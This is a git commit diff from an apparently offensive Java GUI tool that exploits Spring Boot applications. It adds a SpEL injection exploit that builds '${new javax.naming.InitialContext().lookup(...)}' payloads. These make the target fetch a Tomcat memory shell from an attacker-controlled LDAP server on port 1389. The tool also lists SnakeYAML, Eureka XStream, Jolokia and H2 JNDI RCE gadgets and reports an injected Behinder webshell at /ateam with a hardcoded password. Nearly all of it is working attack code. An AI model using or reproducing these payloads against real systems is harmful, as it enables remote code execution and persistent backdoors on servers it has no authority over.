ADD SpELRCEEXP

SummerSec · SummerSec · commit 0a505c7fea8a · 2021-08-23T17:17:39.000+08:00
diff --git a/src/main/java/com/drops/exp/SnakeYAMLRCEEXP.java b/src/main/java/com/drops/exp/SnakeYAMLRCEEXP.java
@@ -35,13 +35,13 @@ public boolean sendExp(String target, String vps, String EchoType, boolean versi
                     if (re.isOk()){
                         HttpResponse res = HTTPUtils.postRequestV1(url,"refresh");
                         if (res.isOk()){
-                            this.mainController.execOutputArea.appendText(Utils.log(res.body()));
+//                            this.mainController.execOutputArea.appendText(Utils.log(res.body()));
                             return true;
                         }
                     }
                 }
             }else {
-                this.mainController.execOutputArea.appendText(Utils.log("利用失败，请手动验证是否存在漏洞！"));
+//                this.mainController.execOutputArea.appendText(Utils.log("利用失败，请手动验证是否存在漏洞！"));
             }
         }else {
             String url = URLUtil.getROOT(target);
@@ -51,14 +51,14 @@ public boolean sendExp(String target, String vps, String EchoType, boolean versi
                     if (re.isOk()) {
                         HttpResponse res = HTTPUtils.postRequestV2(url,"refresh");
                         if (!res.isOk()){
-                            this.mainController.execOutputArea.appendText(Utils.log(res.body()));
+//                            this.mainController.execOutputArea.appendText(Utils.log(res.body()));
                             return true;
                         }
                     }
                 }
 
             }else {
-                this.mainController.execOutputArea.appendText(Utils.log("利用失败，请手动验证是否存在漏洞！"));
+//                this.mainController.execOutputArea.appendText(Utils.log("利用失败，请手动验证是否存在漏洞！"));
 
             }
         }
diff --git a/src/main/java/com/drops/exp/SpELRCEEXP.java b/src/main/java/com/drops/exp/SpELRCEEXP.java
@@ -0,0 +1,29 @@
+package com.drops.exp;
+
+import com.drops.utils.SpelUtils;
+
+/**
+ * @ClassName: SpELRCEEXP
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/8/23 16:09
+ * @Version: v1.0.0
+ * @Description:
+ **/
+public class SpELRCEEXP {
+
+    public String SpELRCEEXP(String vps){
+        String poc  = "";
+        String ldap = "ldap://" + vps + ":1389/basic/TomcatMemShell3";
+        System.out.println(ldap);
+        SpelUtils spelUtils = new SpelUtils();
+        poc = spelUtils.SpelExpr(ldap);
+
+        return poc;
+    }
+
+    public static void main(String[] args) {
+        SpELRCEEXP spELRCEEXP = new SpELRCEEXP();
+        spELRCEEXP.SpELRCEEXP("127.0.0.1");
+    }
+}
diff --git a/src/main/java/com/drops/main/AttackService.java b/src/main/java/com/drops/main/AttackService.java
@@ -93,7 +93,7 @@ public boolean gadgetSend(String target, String vps, String gadget, String echo)
                 }
             }
         }catch (Exception e){
-            this.mainController.logTextArea.appendText(Utils.log(e.getMessage()));
+            return false;
         }
 
         return false;
diff --git a/src/main/java/com/drops/ui/MainController.java b/src/main/java/com/drops/ui/MainController.java
@@ -3,10 +3,7 @@
 import com.drops.entity.ControllersFactory;
 import com.drops.main.AttackService;
 import com.drops.poc.SpringBootInfo;
-import com.drops.utils.HTTPUtils;
-import com.drops.utils.LDAPUtil;
-import com.drops.utils.URLUtil;
-import com.drops.utils.Utils;
+import com.drops.utils.*;
 import javafx.beans.value.ChangeListener;
 import javafx.beans.value.ObservableValue;
 import javafx.collections.FXCollections;
@@ -114,7 +111,7 @@ private void initConnect() {
 
 
     private void initComBoBox() {
-        ObservableList<String> gadgets = FXCollections.observableArrayList(new String[]{ "SnakeYAMLRCE", "EurekaXstreamRCE", "JolokiaLogbackRCE", "JolokiaRealmRCE", "H2DatabaseConsoleJNDIRCE"});
+        ObservableList<String> gadgets = FXCollections.observableArrayList(new String[]{ "SnakeYAMLRCE", "SpELRCE", "EurekaXstreamRCE", "JolokiaLogbackRCE", "JolokiaRealmRCE", "H2DatabaseConsoleJNDIRCE"});
         this.gadgetOpt.setPromptText("SnakeYAMLRCE");
         this.gadgetOpt.setValue("SnakeYAMLRCE");
         this.gadgetOpt.setItems(gadgets);
@@ -269,17 +266,25 @@ public void crackSpcGadgetBtn(ActionEvent actionEvent) {
         }
 
         if (!this.vps.getText().equals("") && !this.targetAddress.getText().equals("")){
-            boolean flag = this.attackService.gadgetSend(this.targetAddress.getText(),
-                    this.vps.getText(),this.gadgetOpt.getValue(),"TomcatEcho");
-            if(flag){
-                if (HTTPUtils.getRequest(String.valueOf(this.targetAddress.getText()),"ateam").isOk()){
-                    this.logTextArea.appendText(Utils.log("  冰蝎内存马注入成功 !"));
-                    this.logTextArea.appendText(Utils.log( "  /ateam 密码：ateamnb"));
+            if (this.gadgetOpt.getValue().equalsIgnoreCase("spelrce")){
+                SpelUtils spel = new SpelUtils();
+                String poc = spel.SpelExpr(this.vps.getText());
+                this.logTextArea.appendText(Utils.log("Payload 食用方法示例：http://127.0.0.1:9091/article?id=Payload"));
+                this.logTextArea.appendText(Utils.log("ldap://" + this.vps.getText() + ":1389/basic/TomcatMemShell3"));
+                this.logTextArea.appendText(Utils.log(poc));
+            }else {
+                boolean flag = this.attackService.gadgetSend(this.targetAddress.getText(),
+                        this.vps.getText(),this.gadgetOpt.getValue(),"TomcatEcho");
+                if(flag){
+                    if (HTTPUtils.getRequest(String.valueOf(this.targetAddress.getText()),"ateam").isOk()){
+                        this.logTextArea.appendText(Utils.log("  冰蝎内存马注入成功 !"));
+                        this.logTextArea.appendText(Utils.log( "  /ateam 密码：ateamnb"));
+                    }else {
+                        this.logTextArea.appendText(Utils.log("漏洞利用失败！\t"));
+                    }
                 }else {
                     this.logTextArea.appendText(Utils.log("漏洞利用失败！\t"));
                 }
-            }else {
-                this.logTextArea.appendText(Utils.log("漏洞利用失败！\t"));
             }
         }
 
diff --git a/src/main/java/com/drops/utils/SpelUtils.java b/src/main/java/com/drops/utils/SpelUtils.java
@@ -1,6 +1,7 @@
 package com.drops.utils;
 
 import cn.hutool.core.util.HexUtil;
+import com.sun.rowset.JdbcRowSetImpl;
 
 /**
  * @ClassName: SpelUtils
@@ -12,9 +13,14 @@
  **/
 public class SpelUtils {
     String Command = "calc";
-    String result = "${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{ ";
+    String rmi =  "ldap://127.0.0.1:1389/basic/TomcatMemShell3";
+
+    public String SpelExpr(String cmd){
+        String result = "${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{ ";
+        String jndi = "${T(javax.naming.InitialContext().lookup(new String(new byte[]{ ";
+        String ldap = "${new javax.naming.InitialContext().lookup(new String(new byte[]{ ";
+
 
-    public String SpelExpr(String cmd, String result){
         StringBuilder sb = new StringBuilder();
         char[] ch = cmd.toCharArray();
         for (int i=0 ; i<ch.length; i++){
@@ -24,14 +30,22 @@ public String SpelExpr(String cmd, String result){
             }
         }
 
-        result += sb.append(" }))}").toString();
-        System.out.println(result);
-        return result;
+//        result += sb.append(" }))}").toString();
+//        System.out.println(result);
+//        return result;
+//        jndi += sb.append(" })}").toString();
+//        System.out.println(jndi);
+//        return jndi;
+        ldap += sb.append(" }))}").toString();
+        System.out.println(ldap);
+        return ldap;
+
     }
 
     public static void main(String[] args) {
        SpelUtils s = new SpelUtils();
-       s.SpelExpr(s.Command, s.result);
+//       s.SpelExpr(s.rmi);
+       s.SpelExpr(s.rmi);
 
     }
 

Original file line number	Diff line number	Diff line change
`@@ -35,13 +35,13 @@ public boolean sendExp(String target, String vps, String EchoType, boolean versi`
`35`	`35`	`if (re.isOk()){`
`36`	`36`	`HttpResponse res = HTTPUtils.postRequestV1(url,"refresh");`
`37`	`37`	`if (res.isOk()){`
`38`		`- this.mainController.execOutputArea.appendText(Utils.log(res.body()));`
	`38`	`+// this.mainController.execOutputArea.appendText(Utils.log(res.body()));`
`39`	`39`	`return true;`
`40`	`40`	`}`
`41`	`41`	`}`
`42`	`42`	`}`
`43`	`43`	`}else {`
`44`		`- this.mainController.execOutputArea.appendText(Utils.log("利用失败，请手动验证是否存在漏洞！"));`
	`44`	`+// this.mainController.execOutputArea.appendText(Utils.log("利用失败，请手动验证是否存在漏洞！"));`
`45`	`45`	`}`
`46`	`46`	`}else {`
`47`	`47`	`String url = URLUtil.getROOT(target);`
`@@ -51,14 +51,14 @@ public boolean sendExp(String target, String vps, String EchoType, boolean versi`
`51`	`51`	`if (re.isOk()) {`
`52`	`52`	`HttpResponse res = HTTPUtils.postRequestV2(url,"refresh");`
`53`	`53`	`if (!res.isOk()){`
`54`		`- this.mainController.execOutputArea.appendText(Utils.log(res.body()));`
	`54`	`+// this.mainController.execOutputArea.appendText(Utils.log(res.body()));`
`55`	`55`	`return true;`
`56`	`56`	`}`
`57`	`57`	`}`
`58`	`58`	`}`
`59`	`59`
`60`	`60`	`}else {`
`61`		`- this.mainController.execOutputArea.appendText(Utils.log("利用失败，请手动验证是否存在漏洞！"));`
	`61`	`+// this.mainController.execOutputArea.appendText(Utils.log("利用失败，请手动验证是否存在漏洞！"));`
`62`	`62`
`63`	`63`	`}`
`64`	`64`	`}`
Original file line number	Diff line number	Diff line change
`@@ -93,7 +93,7 @@ public boolean gadgetSend(String target, String vps, String gadget, String echo)`
`93`	`93`	`}`
`94`	`94`	`}`
`95`	`95`	`}catch (Exception e){`
`96`		`- this.mainController.logTextArea.appendText(Utils.log(e.getMessage()));`
	`96`	`+ return false;`
`97`	`97`	`}`
`98`	`98`
`99`	`99`	`return false;`